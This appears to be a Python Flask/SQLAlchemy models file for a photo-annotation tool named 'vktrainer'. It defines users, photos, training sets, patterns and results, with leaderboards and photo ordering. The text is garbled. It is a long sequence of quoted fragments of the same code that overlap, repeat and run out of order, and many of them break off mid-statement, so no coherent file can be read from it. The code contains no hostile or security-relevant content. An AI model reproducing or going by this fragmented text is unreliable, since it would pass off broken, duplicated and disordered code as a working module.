json.loads(self.result) except ValueError: # Could not decode", "self.photos.order_by('id').first() return next_photo def _get_previous_photo_linear(self, photo): previous_photo = self.photos.filter(Photo.id < photo.id).order_by('-id').first() if not", "self.get_absolute_url(), } @classmethod def create(cls, photo, training_set, user, result, **kwargs): training_result = cls(", "user, False @login_manager.user_loader def load_user(userid): return User.query.filter(User.id == userid).first() class Photo(db.Model): id =", "photos_without_results = photos_without_results.filter(Photo.id != photo.id) nb_photos_without_results = photos_without_results.count() if nb_photos_without_results: return photos_without_results.all()[random.randint(0, nb_photos_without_results", "= db.Column(db.Integer, db.ForeignKey('user.id')) training_set = db.relation('TrainingSet', backref=db.backref('training_results', lazy='dynamic')) photo = db.relation('Photo') user =", "json import os import random from shutil import copyfile from flask import url_for,", "= db.dynamic_loader( 'Photo', secondary=photos, backref=db.backref('training_sets', lazy='dynamic')) def __str__(self): return self.name def get_absolute_url(self): return", "backref=db.backref('training_results')) result = db.Column(db.Text) # Result stored in JSON photo_is_incorrect = db.Column(db.Boolean, default=False)", "def get_leaderboard(self): count = func.count(TrainingResult.id) return self.training_results.join( TrainingResult.user, ).add_column( count, ).group_by( TrainingResult.user_id, ).order_by(", "db.Table('training_set_photos', db.Column('training_set_id', db.Integer, db.ForeignKey('training_set.id')), db.Column('photo_id', db.Integer, db.ForeignKey('photo.id')) ) class User(UserMixin, db.Model): id =", "in semi random mode (breaks UX) return None class TrainingPattern(db.Model): id = db.Column(db.Integer,", "return user, False @login_manager.user_loader def load_user(userid): return User.query.filter(User.id == userid).first() class Photo(db.Model): id", "return os.path.join(self.PICTURES_FOLDER, self.md5) def get_absolute_url(self): return url_for('vktrainer.show_photo', pk=self.id) class TrainingSet(db.Model): id = db.Column(db.Integer,", "_, filename = os.path.split(file) path = os.path.join('vktrainer', cls.PICTURES_FOLDER, md5) copyfile(file, path) name, _", "None class TrainingPattern(db.Model): id = db.Column(db.Integer, primary_key=True) training_set_id = db.Column(db.Integer, db.ForeignKey('training_set.id')) name =", "training_set_id = db.Column(db.Integer, db.ForeignKey('training_set.id')) name = db.Column(db.String(64)) instruction = db.Column(db.Text) training_set = db.relation('TrainingSet',", "photo \"\"\" photos_without_results = self.photos.filter(~Photo.id.in_( self.training_results.with_entities(TrainingResult.photo_id) )) if photo: photos_without_results = photos_without_results.filter(Photo.id !=", "is not None: return None # We copy the file _, filename =", "* 100 def get_first_photo(self): if app.config['SHOW_PICTURES_ORDERING'] == 'linear': return self.photos.order_by('id').first() else: return self._get_next_photo_semi_random(None)", "import db, login_manager from vktrainer.utils import get_md5 photos = db.Table('training_set_photos', db.Column('training_set_id', db.Integer, db.ForeignKey('training_set.id')),", "photo def get_path(self): return os.path.join(self.PICTURES_FOLDER, self.md5) def get_absolute_url(self): return url_for('vktrainer.show_photo', pk=self.id) class TrainingSet(db.Model):", "'Photo marked as incorrect' else: try: loaded_result = json.loads(self.result) except ValueError: # Could", "backref=db.backref('patterns', lazy='dynamic')) pattern_ref = db.Column(db.String(64)) position = db.Column(db.Integer) @property def pattern(self): from .patterns", "= db.Column(db.Integer) @property def pattern(self): from .patterns import REF_TO_PATTERN_CLASS try: return REF_TO_PATTERN_CLASS[self.pattern_ref] except", "self.photos.filter(Photo.id > photo.id).order_by('id').first() if not next_photo: # We are already at the last", "in self.training_results.all()] def get_leaderboard(self): count = func.count(TrainingResult.id) return self.training_results.join( TrainingResult.user, ).add_column( count, ).group_by(", "cls.query.filter(cls.name == name).first() if not user: user = cls(name=name) db.session.add(user) db.session.commit() return user,", "= cls(name=name) db.session.add(user) db.session.commit() return user, True return user, False @login_manager.user_loader def load_user(userid):", "if self.user else None, 'result': result, 'id': self.id, 'url': self.get_absolute_url(), } @classmethod def", "db.Column(db.String(64)) PICTURES_FOLDER = 'pictures/' @classmethod def create_from_file(cls, file, check_if_exists=True): # We check no", "self.photos.count() return float(nb_photos_with_results) / nb_photos * 100 def get_first_photo(self): if app.config['SHOW_PICTURES_ORDERING'] == 'linear':", "else None, 'result': result, 'id': self.id, 'url': self.get_absolute_url(), } @classmethod def create(cls, photo,", "-*- coding: utf-8 -*- import json import os import random from shutil import", "def get_results(self): return [tr.get_pretty_result() for tr in self.training_results.all()] def get_leaderboard(self): count = func.count(TrainingResult.id)", "backref=db.backref('training_sets', lazy='dynamic')) def __str__(self): return self.name def get_absolute_url(self): return url_for('vktrainer.training_set', pk=self.id) def get_results_url(self):", "if photo is not None: return None # We copy the file _,", "os.path.join(self.PICTURES_FOLDER, self.md5) def get_absolute_url(self): return url_for('vktrainer.show_photo', pk=self.id) class TrainingSet(db.Model): id = db.Column(db.Integer, primary_key=True)", "self.training_results.with_entities(TrainingResult.photo_id) )) if photo: photos_without_results = photos_without_results.filter(Photo.id != photo.id) nb_photos_without_results = photos_without_results.count() if", "training_set = db.relation('TrainingSet', backref=db.backref('patterns', lazy='dynamic')) pattern_ref = db.Column(db.String(64)) position = db.Column(db.Integer) @property def", "self.photo_is_incorrect: result = 'Photo marked as incorrect' else: try: loaded_result = json.loads(self.result) except", "= db.Column(db.Integer, db.ForeignKey('photo.id')) user_id = db.Column(db.Integer, db.ForeignKey('user.id')) training_set = db.relation('TrainingSet', backref=db.backref('training_results', lazy='dynamic')) photo", "else: result = { 'state': 'KO', 'value': {}, } return { 'photo': {", "photos = db.Table('training_set_photos', db.Column('training_set_id', db.Integer, db.ForeignKey('training_set.id')), db.Column('photo_id', db.Integer, db.ForeignKey('photo.id')) ) class User(UserMixin, db.Model):", "get_absolute_url(self): return url_for( 'vktrainer.training_set_result', training_set_pk=self.training_set.id, result_pk=self.id, ) def get_pretty_result(self): if self.photo_is_incorrect: result =", "get_results(self): return [tr.get_pretty_result() for tr in self.training_results.all()] def get_leaderboard(self): count = func.count(TrainingResult.id) return", "are already at the first photo, we show the last one previous_photo =", "db.Column(db.String(64)) photos = db.dynamic_loader( 'Photo', secondary=photos, backref=db.backref('training_sets', lazy='dynamic')) def __str__(self): return self.name def", "None if loaded_result: result = { 'state': 'OK', 'value': loaded_result, } else: result", "photo without any results If there aren't any, we serve a random photo", "db.Column(db.String(64)) def __repr__(self): return self.name @classmethod def get_or_create(cls, name): user = cls.query.filter(cls.name ==", "return User.query.filter(User.id == userid).first() class Photo(db.Model): id = db.Column(db.Integer, primary_key=True) name = db.Column(db.String(64))", "False @login_manager.user_loader def load_user(userid): return User.query.filter(User.id == userid).first() class Photo(db.Model): id = db.Column(db.Integer,", "Photo.id.in_(self.training_results.with_entities(TrainingResult.photo_id)) ).count() nb_photos = self.photos.count() return float(nb_photos_with_results) / nb_photos * 100 def get_first_photo(self):", "create(cls, photo, training_set, user, result, **kwargs): training_result = cls( photo=photo, training_set=training_set, user=user, result=result,", "load_user(userid): return User.query.filter(User.id == userid).first() class Photo(db.Model): id = db.Column(db.Integer, primary_key=True) name =", ") def get_pretty_result(self): if self.photo_is_incorrect: result = 'Photo marked as incorrect' else: try:", "db.Column(db.String(64)) picture = db.Column(db.String(128)) md5 = db.Column(db.String(64)) PICTURES_FOLDER = 'pictures/' @classmethod def create_from_file(cls,", "= None if loaded_result: result = { 'state': 'OK', 'value': loaded_result, } else:", "loaded_result, } else: result = { 'state': 'KO', 'value': {}, } return {", "= os.path.split(file) path = os.path.join('vktrainer', cls.PICTURES_FOLDER, md5) copyfile(file, path) name, _ = os.path.splitext(filename)", "= cls.query.filter(cls.name == name).first() if not user: user = cls(name=name) db.session.add(user) db.session.commit() return", "next_photo = self.photos.filter(Photo.id > photo.id).order_by('id').first() if not next_photo: # We are already at", "(breaks UX) return None class TrainingPattern(db.Model): id = db.Column(db.Integer, primary_key=True) training_set_id = db.Column(db.Integer,", "pk=self.id) def get_results(self): return [tr.get_pretty_result() for tr in self.training_results.all()] def get_leaderboard(self): count =", "pk=self.id) def get_leaderboard_url(self): return url_for('vktrainer.training_set_leaderboard', pk=self.id) def get_results(self): return [tr.get_pretty_result() for tr in", "'name': self.photo.name, 'id': self.photo.id, }, 'user': self.user.name if self.user else None, 'result': result,", "We check no photo with the same md5 already exists in db md5", "serve a random photo without any results If there aren't any, we serve", "TrainingResult.user, ).add_column( count, ).group_by( TrainingResult.user_id, ).order_by( desc(count), ).values( User.name, count, ) def get_percentage_done(self):", "result, 'id': self.id, 'url': self.get_absolute_url(), } @classmethod def create(cls, photo, training_set, user, result,", "user = cls(name=name) db.session.add(user) db.session.commit() return user, True return user, False @login_manager.user_loader def", "db.Column(db.String(64)) instruction = db.Column(db.Text) training_set = db.relation('TrainingSet', backref=db.backref('patterns', lazy='dynamic')) pattern_ref = db.Column(db.String(64)) position", "import random from shutil import copyfile from flask import url_for, current_app as app", "without any results If there aren't any, we serve a random photo \"\"\"", "= db.Column(db.Integer, primary_key=True) name = db.Column(db.String(64)) def __repr__(self): return self.name @classmethod def get_or_create(cls,", "# Result stored in JSON photo_is_incorrect = db.Column(db.Boolean, default=False) def get_absolute_url(self): return url_for(", "= self.photos.filter( Photo.id.in_(self.training_results.with_entities(TrainingResult.photo_id)) ).count() nb_photos = self.photos.count() return float(nb_photos_with_results) / nb_photos * 100", "'linear': return self._get_next_photo_linear(photo) else: return self._get_next_photo_semi_random(photo) def _get_next_photo_linear(self, photo): next_photo = self.photos.filter(Photo.id >", "get_md5(file) if check_if_exists: photo = cls.query.filter_by(md5=md5).first() if photo is not None: return None", "return { 'photo': { 'name': self.photo.name, 'id': self.photo.id, }, 'user': self.user.name if self.user", "= db.Column(db.Integer, primary_key=True) training_set_id = db.Column(db.Integer, db.ForeignKey('training_set.id')) photo_id = db.Column(db.Integer, db.ForeignKey('photo.id')) user_id =", "db.Integer, db.ForeignKey('photo.id')) ) class User(UserMixin, db.Model): id = db.Column(db.Integer, primary_key=True) name = db.Column(db.String(64))", "from flask import url_for, current_app as app from flask_login import UserMixin from sqlalchemy", "result = { 'state': 'OK', 'value': loaded_result, } else: result = { 'state':", "return [tr.get_pretty_result() for tr in self.training_results.all()] def get_leaderboard(self): count = func.count(TrainingResult.id) return self.training_results.join(", "True return user, False @login_manager.user_loader def load_user(userid): return User.query.filter(User.id == userid).first() class Photo(db.Model):", "'id': self.id, 'url': self.get_absolute_url(), } @classmethod def create(cls, photo, training_set, user, result, **kwargs):", "flask import url_for, current_app as app from flask_login import UserMixin from sqlalchemy import", "[tr.get_pretty_result() for tr in self.training_results.all()] def get_leaderboard(self): count = func.count(TrainingResult.id) return self.training_results.join( TrainingResult.user,", "desc(count), ).values( User.name, count, ) def get_percentage_done(self): nb_photos_with_results = self.photos.filter( Photo.id.in_(self.training_results.with_entities(TrainingResult.photo_id)) ).count() nb_photos", "return url_for('vktrainer.training_set', pk=self.id) def get_results_url(self): return url_for('vktrainer.training_set_results', pk=self.id) def get_leaderboard_url(self): return url_for('vktrainer.training_set_leaderboard', pk=self.id)", "== 'linear': return self.photos.order_by('id').first() else: return self._get_next_photo_semi_random(None) def get_next_photo(self, photo): if app.config['SHOW_PICTURES_ORDERING'] ==", "return self.training_results.join( TrainingResult.user, ).add_column( count, ).group_by( TrainingResult.user_id, ).order_by( desc(count), ).values( User.name, count, )", "if self.photo_is_incorrect: result = 'Photo marked as incorrect' else: try: loaded_result = json.loads(self.result)", "self.user else None, 'result': result, 'id': self.id, 'url': self.get_absolute_url(), } @classmethod def create(cls,", "primary_key=True) name = db.Column(db.String(64)) def __repr__(self): return self.name @classmethod def get_or_create(cls, name): user", "KeyError: raise KeyError('Unknown pattern: {}'.format(self.pattern_ref)) class TrainingResult(db.Model): id = db.Column(db.Integer, primary_key=True) training_set_id =", "= 'Photo marked as incorrect' else: try: loaded_result = json.loads(self.result) except ValueError: #", "REF_TO_PATTERN_CLASS[self.pattern_ref] except KeyError: raise KeyError('Unknown pattern: {}'.format(self.pattern_ref)) class TrainingResult(db.Model): id = db.Column(db.Integer, primary_key=True)", "get_absolute_url(self): return url_for('vktrainer.show_photo', pk=self.id) class TrainingSet(db.Model): id = db.Column(db.Integer, primary_key=True) name = db.Column(db.String(64))", "primary_key=True) name = db.Column(db.String(64)) picture = db.Column(db.String(128)) md5 = db.Column(db.String(64)) PICTURES_FOLDER = 'pictures/'", "photo): if app.config['SHOW_PICTURES_ORDERING'] == 'linear': return self._get_next_photo_linear(photo) else: return self._get_next_photo_semi_random(photo) def _get_next_photo_linear(self, photo):", "training_result = cls( photo=photo, training_set=training_set, user=user, result=result, **kwargs ) db.session.add(training_result) db.session.commit() return training_result", "= self.photos.filter(~Photo.id.in_( self.training_results.with_entities(TrainingResult.photo_id) )) if photo: photos_without_results = photos_without_results.filter(Photo.id != photo.id) nb_photos_without_results =", "stored in JSON photo_is_incorrect = db.Column(db.Boolean, default=False) def get_absolute_url(self): return url_for( 'vktrainer.training_set_result', training_set_pk=self.training_set.id,", "filename = os.path.split(file) path = os.path.join('vktrainer', cls.PICTURES_FOLDER, md5) copyfile(file, path) name, _ =", "url_for('vktrainer.training_set', pk=self.id) def get_results_url(self): return url_for('vktrainer.training_set_results', pk=self.id) def get_leaderboard_url(self): return url_for('vktrainer.training_set_leaderboard', pk=self.id) def", "nb_photos = self.photos.count() random_nb = random.randint(0, nb_photos - 1) return self.photos.all()[random_nb] def _get_previous_photo_semi_random(self,", "previous_photo def _get_next_photo_semi_random(self, photo): \"\"\" We serve a random photo without any results", "user = db.relation('User', lazy='joined', backref=db.backref('training_results')) result = db.Column(db.Text) # Result stored in JSON", "if check_if_exists: photo = cls.query.filter_by(md5=md5).first() if photo is not None: return None #", "100 def get_first_photo(self): if app.config['SHOW_PICTURES_ORDERING'] == 'linear': return self.photos.order_by('id').first() else: return self._get_next_photo_semi_random(None) def", "1) return self.photos.all()[random_nb] def _get_previous_photo_semi_random(self, photo): # Don't want to allow previous photo", "} else: result = { 'state': 'KO', 'value': {}, } return { 'photo':", "result = { 'state': 'KO', 'value': {}, } return { 'photo': { 'name':", "float(nb_photos_with_results) / nb_photos * 100 def get_first_photo(self): if app.config['SHOW_PICTURES_ORDERING'] == 'linear': return self.photos.order_by('id').first()", "photo = Photo(name=name, md5=md5, picture=path) db.session.add(photo) db.session.commit() return photo def get_path(self): return os.path.join(self.PICTURES_FOLDER,", "except KeyError: raise KeyError('Unknown pattern: {}'.format(self.pattern_ref)) class TrainingResult(db.Model): id = db.Column(db.Integer, primary_key=True) training_set_id", "if nb_photos_without_results: return photos_without_results.all()[random.randint(0, nb_photos_without_results - 1)] else: nb_photos = self.photos.count() random_nb =", "- 1)] else: nb_photos = self.photos.count() random_nb = random.randint(0, nb_photos - 1) return", "def get_or_create(cls, name): user = cls.query.filter(cls.name == name).first() if not user: user =", "None: return None # We copy the file _, filename = os.path.split(file) path", "Don't want to allow previous photo in semi random mode (breaks UX) return", "import func, desc # from vktrainer import db, app, login_manager from vktrainer import", "'linear': return self.photos.order_by('id').first() else: return self._get_next_photo_semi_random(None) def get_next_photo(self, photo): if app.config['SHOW_PICTURES_ORDERING'] == 'linear':", "# Don't want to allow previous photo in semi random mode (breaks UX)", "app from flask_login import UserMixin from sqlalchemy import func, desc # from vktrainer", "**kwargs): training_result = cls( photo=photo, training_set=training_set, user=user, result=result, **kwargs ) db.session.add(training_result) db.session.commit() return", "photo is not None: return None # We copy the file _, filename", "return url_for('vktrainer.training_set_results', pk=self.id) def get_leaderboard_url(self): return url_for('vktrainer.training_set_leaderboard', pk=self.id) def get_results(self): return [tr.get_pretty_result() for", "name): user = cls.query.filter(cls.name == name).first() if not user: user = cls(name=name) db.session.add(user)", ").group_by( TrainingResult.user_id, ).order_by( desc(count), ).values( User.name, count, ) def get_percentage_done(self): nb_photos_with_results = self.photos.filter(", "from .patterns import REF_TO_PATTERN_CLASS try: return REF_TO_PATTERN_CLASS[self.pattern_ref] except KeyError: raise KeyError('Unknown pattern: {}'.format(self.pattern_ref))", "import copyfile from flask import url_for, current_app as app from flask_login import UserMixin", "db.session.add(photo) db.session.commit() return photo def get_path(self): return os.path.join(self.PICTURES_FOLDER, self.md5) def get_absolute_url(self): return url_for('vktrainer.show_photo',", "pattern(self): from .patterns import REF_TO_PATTERN_CLASS try: return REF_TO_PATTERN_CLASS[self.pattern_ref] except KeyError: raise KeyError('Unknown pattern:", "count = func.count(TrainingResult.id) return self.training_results.join( TrainingResult.user, ).add_column( count, ).group_by( TrainingResult.user_id, ).order_by( desc(count), ).values(", "last one previous_photo = self.photos.order_by('-id').first() return previous_photo def _get_next_photo_semi_random(self, photo): \"\"\" We serve", "nb_photos_without_results - 1)] else: nb_photos = self.photos.count() random_nb = random.randint(0, nb_photos - 1)", "lazy='joined', backref=db.backref('training_results')) result = db.Column(db.Text) # Result stored in JSON photo_is_incorrect = db.Column(db.Boolean,", "the last one previous_photo = self.photos.order_by('-id').first() return previous_photo def _get_next_photo_semi_random(self, photo): \"\"\" We", "def get_path(self): return os.path.join(self.PICTURES_FOLDER, self.md5) def get_absolute_url(self): return url_for('vktrainer.show_photo', pk=self.id) class TrainingSet(db.Model): id", "nb_photos = self.photos.count() return float(nb_photos_with_results) / nb_photos * 100 def get_first_photo(self): if app.config['SHOW_PICTURES_ORDERING']", "def get_absolute_url(self): return url_for( 'vktrainer.training_set_result', training_set_pk=self.training_set.id, result_pk=self.id, ) def get_pretty_result(self): if self.photo_is_incorrect: result", "primary_key=True) training_set_id = db.Column(db.Integer, db.ForeignKey('training_set.id')) name = db.Column(db.String(64)) instruction = db.Column(db.Text) training_set =", "return self._get_next_photo_linear(photo) else: return self._get_next_photo_semi_random(photo) def _get_next_photo_linear(self, photo): next_photo = self.photos.filter(Photo.id > photo.id).order_by('id').first()", "'OK', 'value': loaded_result, } else: result = { 'state': 'KO', 'value': {}, }", "= self.photos.order_by('-id').first() return previous_photo def _get_next_photo_semi_random(self, photo): \"\"\" We serve a random photo", "nb_photos_without_results = photos_without_results.count() if nb_photos_without_results: return photos_without_results.all()[random.randint(0, nb_photos_without_results - 1)] else: nb_photos =", "db.Column(db.Integer, db.ForeignKey('training_set.id')) photo_id = db.Column(db.Integer, db.ForeignKey('photo.id')) user_id = db.Column(db.Integer, db.ForeignKey('user.id')) training_set = db.relation('TrainingSet',", "id = db.Column(db.Integer, primary_key=True) name = db.Column(db.String(64)) picture = db.Column(db.String(128)) md5 = db.Column(db.String(64))", "\"\"\" We serve a random photo without any results If there aren't any,", ").order_by( desc(count), ).values( User.name, count, ) def get_percentage_done(self): nb_photos_with_results = self.photos.filter( Photo.id.in_(self.training_results.with_entities(TrainingResult.photo_id)) ).count()", "tr in self.training_results.all()] def get_leaderboard(self): count = func.count(TrainingResult.id) return self.training_results.join( TrainingResult.user, ).add_column( count,", "ValueError: # Could not decode JSON loaded_result = None if loaded_result: result =", "previous photo in semi random mode (breaks UX) return None class TrainingPattern(db.Model): id", "# We are already at the first photo, we show the last one", "= self.photos.order_by('id').first() return next_photo def _get_previous_photo_linear(self, photo): previous_photo = self.photos.filter(Photo.id < photo.id).order_by('-id').first() if", "md5 = get_md5(file) if check_if_exists: photo = cls.query.filter_by(md5=md5).first() if photo is not None:", "= db.relation('User', lazy='joined', backref=db.backref('training_results')) result = db.Column(db.Text) # Result stored in JSON photo_is_incorrect", "incorrect' else: try: loaded_result = json.loads(self.result) except ValueError: # Could not decode JSON", "return self.photos.all()[random_nb] def _get_previous_photo_semi_random(self, photo): # Don't want to allow previous photo in", "= db.Column(db.Text) training_set = db.relation('TrainingSet', backref=db.backref('patterns', lazy='dynamic')) pattern_ref = db.Column(db.String(64)) position = db.Column(db.Integer)", "the file _, filename = os.path.split(file) path = os.path.join('vktrainer', cls.PICTURES_FOLDER, md5) copyfile(file, path)", "url_for( 'vktrainer.training_set_result', training_set_pk=self.training_set.id, result_pk=self.id, ) def get_pretty_result(self): if self.photo_is_incorrect: result = 'Photo marked", "userid).first() class Photo(db.Model): id = db.Column(db.Integer, primary_key=True) name = db.Column(db.String(64)) picture = db.Column(db.String(128))", "photo = cls.query.filter_by(md5=md5).first() if photo is not None: return None # We copy", "db.session.commit() return photo def get_path(self): return os.path.join(self.PICTURES_FOLDER, self.md5) def get_absolute_url(self): return url_for('vktrainer.show_photo', pk=self.id)", "= db.Column(db.String(64)) instruction = db.Column(db.Text) training_set = db.relation('TrainingSet', backref=db.backref('patterns', lazy='dynamic')) pattern_ref = db.Column(db.String(64))", "training_set = db.relation('TrainingSet', backref=db.backref('training_results', lazy='dynamic')) photo = db.relation('Photo') user = db.relation('User', lazy='joined', backref=db.backref('training_results'))", "already at the last photo, we show the first one next_photo = self.photos.order_by('id').first()", "md5 = db.Column(db.String(64)) PICTURES_FOLDER = 'pictures/' @classmethod def create_from_file(cls, file, check_if_exists=True): # We", "user = cls.query.filter(cls.name == name).first() if not user: user = cls(name=name) db.session.add(user) db.session.commit()", "from sqlalchemy import func, desc # from vktrainer import db, app, login_manager from", "= db.Column(db.String(64)) def __repr__(self): return self.name @classmethod def get_or_create(cls, name): user = cls.query.filter(cls.name", "are already at the last photo, we show the first one next_photo =", "'result': result, 'id': self.id, 'url': self.get_absolute_url(), } @classmethod def create(cls, photo, training_set, user,", "get_first_photo(self): if app.config['SHOW_PICTURES_ORDERING'] == 'linear': return self.photos.order_by('id').first() else: return self._get_next_photo_semi_random(None) def get_next_photo(self, photo):", "user, result, **kwargs): training_result = cls( photo=photo, training_set=training_set, user=user, result=result, **kwargs ) db.session.add(training_result)", "name, _ = os.path.splitext(filename) photo = Photo(name=name, md5=md5, picture=path) db.session.add(photo) db.session.commit() return photo", "serve a random photo \"\"\" photos_without_results = self.photos.filter(~Photo.id.in_( self.training_results.with_entities(TrainingResult.photo_id) )) if photo: photos_without_results", "def get_percentage_done(self): nb_photos_with_results = self.photos.filter( Photo.id.in_(self.training_results.with_entities(TrainingResult.photo_id)) ).count() nb_photos = self.photos.count() return float(nb_photos_with_results) /", "in db md5 = get_md5(file) if check_if_exists: photo = cls.query.filter_by(md5=md5).first() if photo is", "file _, filename = os.path.split(file) path = os.path.join('vktrainer', cls.PICTURES_FOLDER, md5) copyfile(file, path) name,", "path = os.path.join('vktrainer', cls.PICTURES_FOLDER, md5) copyfile(file, path) name, _ = os.path.splitext(filename) photo =", "lazy='dynamic')) pattern_ref = db.Column(db.String(64)) position = db.Column(db.Integer) @property def pattern(self): from .patterns import", "nb_photos_with_results = self.photos.filter( Photo.id.in_(self.training_results.with_entities(TrainingResult.photo_id)) ).count() nb_photos = self.photos.count() return float(nb_photos_with_results) / nb_photos *", "photo): previous_photo = self.photos.filter(Photo.id < photo.id).order_by('-id').first() if not previous_photo: # We are already", "results If there aren't any, we serve a random photo \"\"\" photos_without_results =", "1)] else: nb_photos = self.photos.count() random_nb = random.randint(0, nb_photos - 1) return self.photos.all()[random_nb]", "@login_manager.user_loader def load_user(userid): return User.query.filter(User.id == userid).first() class Photo(db.Model): id = db.Column(db.Integer, primary_key=True)", "== 'linear': return self._get_next_photo_linear(photo) else: return self._get_next_photo_semi_random(photo) def _get_next_photo_linear(self, photo): next_photo = self.photos.filter(Photo.id", "self.photos.all()[random_nb] def _get_previous_photo_semi_random(self, photo): # Don't want to allow previous photo in semi", "self.photos.order_by('id').first() else: return self._get_next_photo_semi_random(None) def get_next_photo(self, photo): if app.config['SHOW_PICTURES_ORDERING'] == 'linear': return self._get_next_photo_linear(photo)", "json.loads(self.result) except ValueError: # Could not decode JSON loaded_result = None if loaded_result:", "db.ForeignKey('photo.id')) ) class User(UserMixin, db.Model): id = db.Column(db.Integer, primary_key=True) name = db.Column(db.String(64)) def", "self.photo.name, 'id': self.photo.id, }, 'user': self.user.name if self.user else None, 'result': result, 'id':", "count, ) def get_percentage_done(self): nb_photos_with_results = self.photos.filter( Photo.id.in_(self.training_results.with_entities(TrainingResult.photo_id)) ).count() nb_photos = self.photos.count() return", "instruction = db.Column(db.Text) training_set = db.relation('TrainingSet', backref=db.backref('patterns', lazy='dynamic')) pattern_ref = db.Column(db.String(64)) position =", "We serve a random photo without any results If there aren't any, we", "previous_photo = self.photos.filter(Photo.id < photo.id).order_by('-id').first() if not previous_photo: # We are already at", "result_pk=self.id, ) def get_pretty_result(self): if self.photo_is_incorrect: result = 'Photo marked as incorrect' else:", "db.session.commit() return user, True return user, False @login_manager.user_loader def load_user(userid): return User.query.filter(User.id ==", "= self.photos.filter(Photo.id < photo.id).order_by('-id').first() if not previous_photo: # We are already at the", "_get_next_photo_linear(self, photo): next_photo = self.photos.filter(Photo.id > photo.id).order_by('id').first() if not next_photo: # We are", "def create(cls, photo, training_set, user, result, **kwargs): training_result = cls( photo=photo, training_set=training_set, user=user,", "previous_photo = self.photos.order_by('-id').first() return previous_photo def _get_next_photo_semi_random(self, photo): \"\"\" We serve a random", "cls.query.filter_by(md5=md5).first() if photo is not None: return None # We copy the file", "@classmethod def get_or_create(cls, name): user = cls.query.filter(cls.name == name).first() if not user: user", "import url_for, current_app as app from flask_login import UserMixin from sqlalchemy import func,", "copy the file _, filename = os.path.split(file) path = os.path.join('vktrainer', cls.PICTURES_FOLDER, md5) copyfile(file,", "return self.photos.order_by('id').first() else: return self._get_next_photo_semi_random(None) def get_next_photo(self, photo): if app.config['SHOW_PICTURES_ORDERING'] == 'linear': return", "= db.Table('training_set_photos', db.Column('training_set_id', db.Integer, db.ForeignKey('training_set.id')), db.Column('photo_id', db.Integer, db.ForeignKey('photo.id')) ) class User(UserMixin, db.Model): id", "loaded_result: result = { 'state': 'OK', 'value': loaded_result, } else: result = {", "get_absolute_url(self): return url_for('vktrainer.training_set', pk=self.id) def get_results_url(self): return url_for('vktrainer.training_set_results', pk=self.id) def get_leaderboard_url(self): return url_for('vktrainer.training_set_leaderboard',", "def __str__(self): return self.name def get_absolute_url(self): return url_for('vktrainer.training_set', pk=self.id) def get_results_url(self): return url_for('vktrainer.training_set_results',", "REF_TO_PATTERN_CLASS try: return REF_TO_PATTERN_CLASS[self.pattern_ref] except KeyError: raise KeyError('Unknown pattern: {}'.format(self.pattern_ref)) class TrainingResult(db.Model): id", "= db.Column(db.Boolean, default=False) def get_absolute_url(self): return url_for( 'vktrainer.training_set_result', training_set_pk=self.training_set.id, result_pk=self.id, ) def get_pretty_result(self):", "'vktrainer.training_set_result', training_set_pk=self.training_set.id, result_pk=self.id, ) def get_pretty_result(self): if self.photo_is_incorrect: result = 'Photo marked as", "one next_photo = self.photos.order_by('id').first() return next_photo def _get_previous_photo_linear(self, photo): previous_photo = self.photos.filter(Photo.id <", "= cls.query.filter_by(md5=md5).first() if photo is not None: return None # We copy the", "get_percentage_done(self): nb_photos_with_results = self.photos.filter( Photo.id.in_(self.training_results.with_entities(TrainingResult.photo_id)) ).count() nb_photos = self.photos.count() return float(nb_photos_with_results) / nb_photos", "self.photos.count() random_nb = random.randint(0, nb_photos - 1) return self.photos.all()[random_nb] def _get_previous_photo_semi_random(self, photo): #", "photos_without_results.count() if nb_photos_without_results: return photos_without_results.all()[random.randint(0, nb_photos_without_results - 1)] else: nb_photos = self.photos.count() random_nb", "import json import os import random from shutil import copyfile from flask import", "= db.Column(db.Integer, db.ForeignKey('training_set.id')) photo_id = db.Column(db.Integer, db.ForeignKey('photo.id')) user_id = db.Column(db.Integer, db.ForeignKey('user.id')) training_set =", "not None: return None # We copy the file _, filename = os.path.split(file)", "check no photo with the same md5 already exists in db md5 =", "def get_results_url(self): return url_for('vktrainer.training_set_results', pk=self.id) def get_leaderboard_url(self): return url_for('vktrainer.training_set_leaderboard', pk=self.id) def get_results(self): return", "flask_login import UserMixin from sqlalchemy import func, desc # from vktrainer import db,", "get_or_create(cls, name): user = cls.query.filter(cls.name == name).first() if not user: user = cls(name=name)", "vktrainer import db, app, login_manager from vktrainer import db, login_manager from vktrainer.utils import", "the last photo, we show the first one next_photo = self.photos.order_by('id').first() return next_photo", "db.Column(db.Integer) @property def pattern(self): from .patterns import REF_TO_PATTERN_CLASS try: return REF_TO_PATTERN_CLASS[self.pattern_ref] except KeyError:", "_ = os.path.splitext(filename) photo = Photo(name=name, md5=md5, picture=path) db.session.add(photo) db.session.commit() return photo def", "photo_id = db.Column(db.Integer, db.ForeignKey('photo.id')) user_id = db.Column(db.Integer, db.ForeignKey('user.id')) training_set = db.relation('TrainingSet', backref=db.backref('training_results', lazy='dynamic'))", "user, True return user, False @login_manager.user_loader def load_user(userid): return User.query.filter(User.id == userid).first() class", "- 1) return self.photos.all()[random_nb] def _get_previous_photo_semi_random(self, photo): # Don't want to allow previous", "Photo(db.Model): id = db.Column(db.Integer, primary_key=True) name = db.Column(db.String(64)) picture = db.Column(db.String(128)) md5 =", "None, 'result': result, 'id': self.id, 'url': self.get_absolute_url(), } @classmethod def create(cls, photo, training_set,", "no photo with the same md5 already exists in db md5 = get_md5(file)", "current_app as app from flask_login import UserMixin from sqlalchemy import func, desc #", "def get_next_photo(self, photo): if app.config['SHOW_PICTURES_ORDERING'] == 'linear': return self._get_next_photo_linear(photo) else: return self._get_next_photo_semi_random(photo) def", "already at the first photo, we show the last one previous_photo = self.photos.order_by('-id').first()", "self._get_next_photo_linear(photo) else: return self._get_next_photo_semi_random(photo) def _get_next_photo_linear(self, photo): next_photo = self.photos.filter(Photo.id > photo.id).order_by('id').first() if", "_get_next_photo_semi_random(self, photo): \"\"\" We serve a random photo without any results If there", "self.photos.filter(~Photo.id.in_( self.training_results.with_entities(TrainingResult.photo_id) )) if photo: photos_without_results = photos_without_results.filter(Photo.id != photo.id) nb_photos_without_results = photos_without_results.count()", "photo_is_incorrect = db.Column(db.Boolean, default=False) def get_absolute_url(self): return url_for( 'vktrainer.training_set_result', training_set_pk=self.training_set.id, result_pk=self.id, ) def", "KeyError('Unknown pattern: {}'.format(self.pattern_ref)) class TrainingResult(db.Model): id = db.Column(db.Integer, primary_key=True) training_set_id = db.Column(db.Integer, db.ForeignKey('training_set.id'))", "= random.randint(0, nb_photos - 1) return 